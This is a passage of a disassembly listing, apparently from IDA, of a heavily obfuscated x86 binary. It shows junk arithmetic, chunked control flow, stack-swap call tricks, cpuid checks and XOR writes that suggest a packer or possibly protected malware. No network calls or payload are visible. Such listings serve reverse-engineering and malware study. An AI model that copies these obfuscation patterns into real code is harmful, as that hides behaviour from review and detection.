sub eax, 818E3EA4h
xor ebp, 9139E529h
loc_428851: ; CODE XREF: sub_42C16F:loc_428A8E�j
rol eax, 16h
and eax, 8F2FF433h
xor eax, 84DC8D7Eh
add eax, ebp
add eax, 0F80586AFh
jmp loc_42C9EA
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
jl loc_42F6BD
jmp sub_429766
; ---------------------------------------------------------------------------
loc_428878: ; CODE XREF: _7hdaygc1:004255AB�j
call sub_42A94C
mov eax, [ebp-30h]
loc_428880: ; CODE XREF: _7hdaygc1:loc_42ADD2�j
push ebp
push edi
push 4D23223Fh
jmp loc_42F2BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E9F
loc_42888C: ; CODE XREF: sub_429E9F-8C�j
xchg edi, ebp
loc_42888E: ; CODE XREF: sub_429E9F-93�j
and edx, 0EA3190AFh
sub edx, 8C5923DDh
add edx, 0EC8B7814h
xchg edx, [esp+0]
; END OF FUNCTION CHUNK FOR sub_429E9F
; START OF FUNCTION CHUNK FOR sub_424744
loc_4288A3: ; CODE XREF: sub_424744+4789�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
shl eax, 0Fh
jmp sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F3E
loc_4288B0: ; CODE XREF: sub_423F3E:loc_423AE6�j
mov eax, [ebp-18h]
shl eax, 2
cdq
push offset loc_42A368
jmp nullsub_16
; END OF FUNCTION CHUNK FOR sub_423F3E
; ---------------------------------------------------------------------------
loc_4288C1: ; CODE XREF: _7hdaygc1:0042E72D�j
jns loc_42A67C
; =============== S U B R O U T I N E =======================================
sub_4288C7 proc near ; CODE XREF: sub_428A39+5�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B1F4 SIZE 00000019 BYTES
xchg ebx, [esp+0]
pop ebx
push ebx
push 0D8D2647h
jmp loc_42B1F4
sub_4288C7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED4E
loc_4288D6: ; CODE XREF: sub_42ED4E:loc_429369�j
xor [esi], edx
jmp loc_426F9F
; END OF FUNCTION CHUNK FOR sub_42ED4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_4288DD: ; CODE XREF: sub_42EBD6+7�j
mov eax, 1
xor ebx, ebx
xor edx, edx
cpuid
jmp loc_424A52
; END OF FUNCTION CHUNK FOR sub_42EBD6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4288EE: ; CODE XREF: _7hdaygc1:0042CB35�j
call sub_42D85F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_4288F4: ; CODE XREF: sub_426130+7E50�j
jmp loc_42D39C
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
loc_4288F9: ; CODE XREF: _7hdaygc1:00426AB2�j
jmp loc_42D143
; =============== S U B R O U T I N E =======================================
sub_4288FE proc near ; CODE XREF: sub_428E56-E76�j
; sub_42AE0B:loc_428956�j ...
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00423B92 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004245F5 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004248A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425870 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425B8C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425D1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042648E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426CA2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042896E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C204 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D92F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042E1C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EEF8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042F69C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FA62 SIZE 00000016 BYTES
jz loc_425870
mov eax, ds:dword_42B9A0
or eax, eax
jnz loc_423B92
jmp loc_42F69C
sub_4288FE endp
; =============== S U B R O U T I N E =======================================
sub_428917 proc near ; CODE XREF: sub_42BE63-1228�p
; _7hdaygc1:0042ACDC�j
; FUNCTION CHUNK AT 004246A6 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push eax
push offset loc_425F96
jmp loc_4246A6
sub_428917 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429766
loc_428926: ; CODE XREF: sub_429766:loc_424545�j
mov eax, ds:dword_425150
mov eax, [eax]
mov ds:dword_425154, eax
xor eax, eax
mov ds:dword_425150, eax
jmp loc_424159
; END OF FUNCTION CHUNK FOR sub_429766
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B49
loc_42893E: ; CODE XREF: sub_429B49�j
call sub_4291A3
loc_428943: ; CODE XREF: sub_42EFBC-B940�j
jmp loc_42FC44
; END OF FUNCTION CHUNK FOR sub_429B49
; =============== S U B R O U T I N E =======================================
sub_428948 proc near ; CODE XREF: _7hdaygc1:00424DCC�j
; _7hdaygc1:0042A23E�p
xchg esi, [esp+0]
pop esi
ror eax, 3
mov ds:dword_42BC48, eax
retn
sub_428948 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE0B
loc_428956: ; CODE XREF: sub_42AE0B+D�j
jmp sub_4288FE
; END OF FUNCTION CHUNK FOR sub_42AE0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_42895B: ; CODE XREF: sub_424744+C�j
jmp loc_4245E9
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426D10
loc_428960: ; CODE XREF: sub_426D10+10�j
mov eax, [ebp+8]
mov eax, [eax-10h]
and eax, 7
call sub_42F05E
; END OF FUNCTION CHUNK FOR sub_426D10
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42896E: ; CODE XREF: sub_4288FE-42EF�j
jmp nullsub_130
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_428973: ; CODE XREF: sub_42E0C4-5202�j
mov eax, offset dword_42BC4C
push ebx
push offset loc_42A80B
jmp nullsub_78
; END OF FUNCTION CHUNK FOR sub_42E0C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_428983: ; CODE XREF: sub_42AA9B-7791�j
and eax, ecx
or eax, 6CFD4E6Eh
add edx, edi
jmp loc_4233A5
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
loc_428992: ; CODE XREF: _7hdaygc1:00423042�j
mov eax, esi
; =============== S U B R O U T I N E =======================================
sub_428994 proc near ; CODE XREF: _7hdaygc1:0042AA5A�p
xchg esi, [esp+0]
pop esi
sub_428994 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_428998: ; CODE XREF: sub_4291EA:loc_428D8A�j
mov edx, [ebp+var_4]
push 32EC051Ch
loc_4289A0: ; CODE XREF: _7hdaygc1:0042DF85�j
pop eax
; END OF FUNCTION CHUNK FOR sub_4291EA
; START OF FUNCTION CHUNK FOR sub_423172
loc_4289A1: ; CODE XREF: sub_423172+A3�j
jmp loc_42EE70
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
loc_4289A6: ; CODE XREF: _7hdaygc1:00429F87�j
; _7hdaygc1:loc_42FAAB�j
mov eax, [ebp-24h]
push edi
loc_4289AA: ; CODE XREF: _7hdaygc1:0042DCB3�j
push 525068F7h
pop edi
or edi, 1BEA7F2Fh
test edi, 80000h
jmp loc_42C06E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_4289C1: ; CODE XREF: sub_42D9E1:loc_42B295�j
jz loc_429AFD
jmp loc_42EDF2
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
loc_4289CC: ; CODE XREF: _7hdaygc1:0042AB89�j
xchg eax, ebp
; =============== S U B R O U T I N E =======================================
sub_4289CE proc near ; CODE XREF: _7hdaygc1:0042D228�p
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00424A5E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425E82 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004293C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B94D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042F704 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
push ecx
push 8D64176Ch
pop ecx
rol ecx, 3
test ecx, 10000000h
jmp loc_4293C9
sub_4289CE endp
; ---------------------------------------------------------------------------
pop ecx
test ecx, esi
jmp loc_42E68F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425182
loc_4289EF: ; CODE XREF: sub_425182+15D7�j
cmp ax, 20FFh
jz loc_4236DB
xor eax, eax
loc_4289FB: ; CODE XREF: sub_425182-1AA5�j
mov [ebp-5], al
jmp loc_4236CF
; END OF FUNCTION CHUNK FOR sub_425182
; =============== S U B R O U T I N E =======================================
sub_428A03 proc near ; DATA XREF: sub_42AFFE:loc_426E91�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B415 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C86A SIZE 00000005 BYTES
push edx
push 38A796D0h
pop edx
or edx, 14A71E11h
sub edx, 700E36FDh
add edx, 667BDBDBh
or edx, 0A94996FBh
add edx, 44E506BFh
jmp loc_42B415
sub_428A03 endp
; =============== S U B R O U T I N E =======================================
sub_428A2D proc near ; CODE XREF: _7hdaygc1:0042C01E�j
; sub_42450E:loc_42D2A5�p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg eax, [esp-4+arg_0]
jmp sub_42A9E0
sub_428A2D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428A39 proc near ; DATA XREF: _7hdaygc1:00425C72�o
call sub_42828C
call sub_4288C7
sub_428A39 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_428A43: ; CODE XREF: sub_42C16F:loc_426BBF�j
pop ebp
mov eax, ds:dword_42BC64
or eax, eax
jnz loc_42D6F0
jmp loc_425991
; END OF FUNCTION CHUNK FOR sub_42C16F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_428A58: ; CODE XREF: sub_42A6C3+B�j
jmp loc_42E2B1
; END OF FUNCTION CHUNK FOR sub_42A6C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428A5E: ; CODE XREF: _7hdaygc1:00429FAE�j
jmp loc_426E03
; ---------------------------------------------------------------------------
loc_428A63: ; CODE XREF: _7hdaygc1:004263F4�j
jge loc_42B90F
; =============== S U B R O U T I N E =======================================
sub_428A69 proc near ; CODE XREF: sub_42B877+A�p
xchg edi, [esp+0]
pop edi
mov eax, esp
sub_428A69 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_428A6F: ; CODE XREF: sub_42DD73-8508�j
push 0
jmp loc_4296D9
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_428A76: ; CODE XREF: sub_42C26B:loc_42C0BC�j
add esp, 8
xor eax, [esp+0]
xor edx, [esp+4]
add esp, 8
push esi
push 0F66AD9F5h
jmp loc_428142
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_428A8E: ; CODE XREF: sub_42C16F:loc_423608�j
jnz loc_428851
test ecx, ebx
jmp loc_42883F
; END OF FUNCTION CHUNK FOR sub_42C16F
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_428A9B proc near ; CODE XREF: sub_42ED2A-306�j
retn
sub_428A9B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_428A9C: ; CODE XREF: sub_42CFDA-391D�j
jmp loc_429E58
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
loc_428AA1: ; CODE XREF: _7hdaygc1:loc_424794�j
pop eax
xor eax, 3B2DFEBDh
or eax, 70B7ADC2h
rol eax, 9
and eax, 0BEC8FD65h
jmp loc_42CEF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_428ABC: ; CODE XREF: sub_425E64:loc_42B69D�j
jnz loc_424BDD
jmp loc_424B82
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_428AC8: ; CODE XREF: _7hdaygc1:00425EE5�j
push ebp
mov ebp, esp
push eax
mov eax, ecx
xchg eax, [esp]
push offset loc_425441
jmp loc_42DBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4CE
loc_428ADB: ; CODE XREF: sub_42F4CE-C175�j
; _7hdaygc1:loc_4273AC�j
or esi, 0A61CA1DFh
adc esi, 9E3481D0h
loc_428AE7: ; CODE XREF: sub_42F4CE:loc_428F81�j
push offset sub_4266F8
jmp nullsub_210
; END OF FUNCTION CHUNK FOR sub_42F4CE
; ---------------------------------------------------------------------------
loc_428AF1: ; CODE XREF: _7hdaygc1:0042A2C4�j
jo loc_42F345
; =============== S U B R O U T I N E =======================================
sub_428AF7 proc near ; CODE XREF: sub_42874A+EE4�p
; FUNCTION CHUNK AT 00425514 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428D7A SIZE 00000006 BYTES
xchg eax, [esp+0]
pop eax
loc_428AFB: ; CODE XREF: _7hdaygc1:00423CFC�j
add esi, edi
jmp loc_425514
sub_428AF7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428B02 proc near ; CODE XREF: _7hdaygc1:004253BC�j
; sub_42EB3E+5�p
xchg esi, [esp+0]
pop esi
mov ebp, esp
call sub_423FA0
pop ebp
retn 10h
sub_428B02 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428B11 proc near ; CODE XREF: _7hdaygc1:0042C03F�p
; sub_4296EF:loc_42D467�p
; FUNCTION CHUNK AT 0042723D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004295C9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042AA02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B4AC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042C292 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E62D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F6D8 SIZE 00000011 BYTES
push ebp
jmp loc_42B4AC
sub_428B11 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428B17: ; DATA XREF: _7hdaygc1:loc_424574�o
mov edi, ebp
mov edi, [edi]
sub edi, eax
mov [ebp+0], edi
pop edi
pop ebp
cmp dword ptr [ebp-38h], 0
jmp loc_426696
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426EBD
loc_428B2B: ; CODE XREF: sub_426EBD+75BF�j
and edx, 0D4D59ABh
sub edx, 0E4EDB16Dh
rol edx, 0Bh
add edx, 6D45221Fh
call sub_428120
loc_428B45: ; CODE XREF: sub_42A92E-1D46�j
jmp loc_4247AB
; END OF FUNCTION CHUNK FOR sub_426EBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_428B4A: ; CODE XREF: sub_425A37+60F�j
jmp loc_4255B0
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
locret_428B4F: ; CODE XREF: _7hdaygc1:loc_423EFD�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_428B50: ; CODE XREF: sub_4237DA+7FDC�j
jmp loc_42EEBE
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_428B55: ; CODE XREF: sub_42EBD6:loc_423CA6�j
pop esi
jmp loc_423297
; END OF FUNCTION CHUNK FOR sub_42EBD6
; =============== S U B R O U T I N E =======================================
sub_428B5B proc near ; DATA XREF: sub_4289CE-3F66�o
; FUNCTION CHUNK AT 004236B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004244AA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004251A5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004256E0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426E4B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426EB3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B2F6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C91F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DC1F SIZE 00000005 BYTES
push eax
call sub_423D07
mov eax, [ebp-4]
jns loc_426E4B
add eax, 28h
mov [ebp-4], eax
jmp loc_4236B4
sub_428B5B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428B75 proc near ; DATA XREF: _7hdaygc1:0042C247�o
xchg eax, [esp+0]
sub_428B75 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_428B78: ; CODE XREF: sub_42F65A:loc_42A750�j
mov ebp, eax
pop eax
push 847B75B6h
jmp loc_42C88E
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_428B85: ; CODE XREF: sub_423648:loc_4243DF�j
cmp dword ptr [ebp-1Ch], 0Fh
loc_428B89: ; CODE XREF: sub_423F02:loc_42CE6C�j
jnz loc_42F13C
mov eax, [ebp-1Ch]
shl eax, 8
push offset sub_42E84F
jmp nullsub_30
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42525E
loc_428B9F: ; CODE XREF: sub_42525E+16�j
push offset sub_42EF77
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_42525E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424680
loc_428BA9: ; CODE XREF: sub_424680:loc_42C889�j
call sub_42AD90
loc_428BAE: ; CODE XREF: _7hdaygc1:loc_426DC3�j
rol eax, 15h
add eax, 0FBE87CA9h
and eax, 87F5FF62h
xor eax, 761D262h
xchg eax, [esp+0]
loc_428BC6: ; CODE XREF: _7hdaygc1:loc_42B914�j
mov eax, [ebp-1Ch]
push eax
call sub_42F03C
loc_428BCF: ; CODE XREF: _7hdaygc1:0042BA6C�j
jmp loc_4258C3
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
loc_428BD4: ; CODE XREF: _7hdaygc1:0042E671�j
and esi, 0D884136Bh
; =============== S U B R O U T I N E =======================================
sub_428BDA proc near ; CODE XREF: sub_42A92E+2158�p
xchg eax, [esp+0]
pop eax
mov ds:dword_42B97C, eax
retn
sub_428BDA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_428BE5: ; CODE XREF: sub_42A92E+2�j
rol eax, 4
jmp loc_428B45
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
loc_428BED: ; DATA XREF: sub_42A6C3-3EEE�o
xor eax, 0B929638Ah
add eax, ebp
add eax, 26FF7D92h
mov eax, [eax]
mov eax, [eax+3Ch]
cdq
push offset sub_42B265
jmp loc_42EA52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_428C0B: ; CODE XREF: sub_42B470:loc_42C5FC�j
and eax, 0E3A28698h
add eax, 0DE20378Ch
mov eax, [eax]
or eax, eax
jnz loc_42E9C1
jmp loc_425791
; END OF FUNCTION CHUNK FOR sub_42B470
; =============== S U B R O U T I N E =======================================
sub_428C26 proc near ; DATA XREF: sub_424AA8+7F31�o
call sub_42B650
retn
sub_428C26 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_428C2C: ; CODE XREF: _7hdaygc1:loc_4239AC�j
; sub_4273CA+80D8�j
jmp nullsub_123
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_428C31: ; CODE XREF: sub_426A39+6F2E�j
jmp loc_42B831
; END OF FUNCTION CHUNK FOR sub_426A39
; ---------------------------------------------------------------------------
loc_428C36: ; CODE XREF: _7hdaygc1:00426816�j
jmp loc_42B349
; =============== S U B R O U T I N E =======================================
sub_428C3B proc near ; CODE XREF: _7hdaygc1:004231CC�p
; sub_42D002:loc_423B8D�j ...
push 0E346104h
pop eax
add eax, 3858AE8Ch
or eax, 0D8CF138Bh
xor eax, 8A388CCEh
retn
sub_428C3B endp
; ---------------------------------------------------------------------------
loc_428C54: ; CODE XREF: _7hdaygc1:0042BA16�j
jz loc_42AB07
ror ecx, 0Dh
jl loc_42977C
jmp loc_42F4EE
; ---------------------------------------------------------------------------
mov eax, [ebp-4]
add eax, 18h
mov [ebp-3Ch], eax
push offset sub_42B6B5
jmp locret_423DA8
; ---------------------------------------------------------------------------
loc_428C7B: ; CODE XREF: _7hdaygc1:loc_42C86F�j
add edx, ebp
add edx, 0C2896A8h
mov edx, [edx]
lea eax, [ebp-14h]
mov ecx, [ebp-30h]
jmp loc_42AE68
; ---------------------------------------------------------------------------
loc_428C90: ; CODE XREF: _7hdaygc1:loc_423CF2�j
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
jmp loc_428F48
; ---------------------------------------------------------------------------
loc_428C9D: ; CODE XREF: _7hdaygc1:0042DC2B�j
mov esi, 68B19C01h
loc_428CA2: ; CODE XREF: _7hdaygc1:loc_42BFAE�j
call sub_42D757
push 0A95FF56Ah
xchg esi, [esp]
loc_428CAF: ; CODE XREF: _7hdaygc1:loc_424CB1�j
mov edx, esi
jmp loc_42F5E1
; ---------------------------------------------------------------------------
loc_428CB6: ; CODE XREF: _7hdaygc1:loc_424DA9�j
jge loc_42B578
jno loc_426BC4
adc esi, ebp
jmp loc_42B578
; ---------------------------------------------------------------------------
loc_428CC9: ; DATA XREF: _7hdaygc1:00426F49�o
push 4C51C24Dh
pop ecx
or ecx, ds:4000FAh
add ecx, 90704F9Dh
jmp loc_426C9D
; ---------------------------------------------------------------------------
push 51D8A8C7h
pop edx
or edx, 178CE679h
sub edx, 65261219h
or edx, 108CD05Ah
xor edx, 0BAD395ACh
jmp loc_42559B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B6B5
loc_428D03: ; CODE XREF: sub_42B6B5:loc_4247F9�j
add edi, eax
add edi, 4ED2E944h
mov [edi], edx
xchg edx, [esp+4+var_4]
push offset loc_42D90C
jmp nullsub_209
; END OF FUNCTION CHUNK FOR sub_42B6B5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E2E
loc_428D1A: ; CODE XREF: sub_426E2E+10�j
lea eax, [ebp-14h]
mov ecx, [ebp-30h]
call sub_42A94C
loc_428D25: ; CODE XREF: _7hdaygc1:00429B6D�j
mov edx, [ebp-4]
lea eax, [ebp-18h]
jmp loc_424D2D
; END OF FUNCTION CHUNK FOR sub_426E2E
; ---------------------------------------------------------------------------
loc_428D30: ; CODE XREF: _7hdaygc1:004234EC�j
pop edi
rol edi, 15h
xor edi, 91D65F5Fh
add edi, 0BAB01310h
push offset loc_4263A2
jmp locret_42C433
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_428D4A: ; CODE XREF: sub_4291EA:loc_4293D4�j
xchg edx, ebx
jmp loc_425946
; END OF FUNCTION CHUNK FOR sub_4291EA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_428D52: ; CODE XREF: sub_423172+8605�j
jmp loc_42368B
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C1F
loc_428D57: ; CODE XREF: sub_429C1F:loc_42D54F�j
mov eax, esp
push 0
; END OF FUNCTION CHUNK FOR sub_429C1F
; START OF FUNCTION CHUNK FOR sub_42D002
loc_428D5B: ; CODE XREF: sub_42D002:loc_42651E�j
mov edx, esp
push ebx
jmp loc_4249B6
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_428D63: ; CODE XREF: sub_426A62:loc_426F6C�j
; sub_426A62+52BB�j
push 1AB6EF2h
pop eax
sub eax, 26A14057h
add eax, 0E5F55716h
jmp loc_426281
; END OF FUNCTION CHUNK FOR sub_426A62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AF7
loc_428D7A: ; CODE XREF: sub_428AF7:loc_425514�j
pop edi
call sub_42F075
; END OF FUNCTION CHUNK FOR sub_428AF7
; START OF FUNCTION CHUNK FOR sub_42F1C6
loc_428D80: ; CODE XREF: sub_42F1C6+12�j
jmp loc_42934C
; END OF FUNCTION CHUNK FOR sub_42F1C6
; ---------------------------------------------------------------------------
loc_428D85: ; CODE XREF: _7hdaygc1:00425D3A�j
jmp loc_42D1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_428D8A: ; CODE XREF: sub_4291EA-30EB�j
jp loc_428998
xor ebx, edx
jmp loc_4272A1
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
loc_428D97: ; CODE XREF: _7hdaygc1:0042E628�j
jl loc_42F5DB
jnp loc_425A3A
loc_428DA3: ; CODE XREF: _7hdaygc1:loc_42CCB5�j
call sub_42D01B
loc_428DA8: ; CODE XREF: _7hdaygc1:loc_427360�j
jnz loc_4290D0
jmp loc_42FCA6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_428DB3: ; CODE XREF: sub_423DFC:loc_4262C4�j
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
push offset loc_42F456
jmp nullsub_76
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_428DC3: ; CODE XREF: sub_42C209+F35�j
; sub_42C209:loc_42EE31�j
mov byte ptr [ebp-20h], 30h
inc dword ptr [ebp-10h]
; END OF FUNCTION CHUNK FOR sub_42C209
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_428DCA: ; CODE XREF: sub_424AE1:loc_424224�j
; _7hdaygc1:0042529E�j ...
dec dword ptr [ebp-10h]
call sub_42AA47
loc_428DD2: ; CODE XREF: sub_423752+A9E5�j
jmp loc_426D25
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_428DD7: ; CODE XREF: sub_42DD73-77D8�j
jmp loc_42DF41
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263AB
loc_428DDC: ; CODE XREF: sub_4263AB+7�j
jmp loc_42E4CD
; END OF FUNCTION CHUNK FOR sub_4263AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_428DE1: ; CODE XREF: sub_4268D9-7B4�j
jmp loc_42599C
; END OF FUNCTION CHUNK FOR sub_4268D9
; =============== S U B R O U T I N E =======================================
sub_428DE6 proc near ; DATA XREF: _7hdaygc1:004261B2�o
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423EFB SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042DC68 SIZE 0000000D BYTES
xchg edi, [esp+0]
mov esi, edi
pop edi
pop ebp
jmp loc_42DC68
sub_428DE6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_428DF2: ; CODE XREF: sub_42616B+3�j
; _7hdaygc1:loc_427D34�j
xchg esi, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
xchg ecx, [esp+4+var_4]
mov ebp, ecx
pop ecx
mov eax, ds:dword_42BC74
jmp loc_4280E8
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
db 0Fh
dd 0FFD9878Ah, 3DADE9FFh
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_428E16: ; CODE XREF: _7hdaygc1:loc_429081�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_428E17: ; CODE XREF: sub_425F27:loc_429ED5�j
; sub_425F27+44C4�j
lea eax, [ebp-14h]
push edx
mov edx, eax
xchg edx, [esp+0]
push edx
push 0A2FB062h
jmp loc_42E5A9
; END OF FUNCTION CHUNK FOR sub_425F27
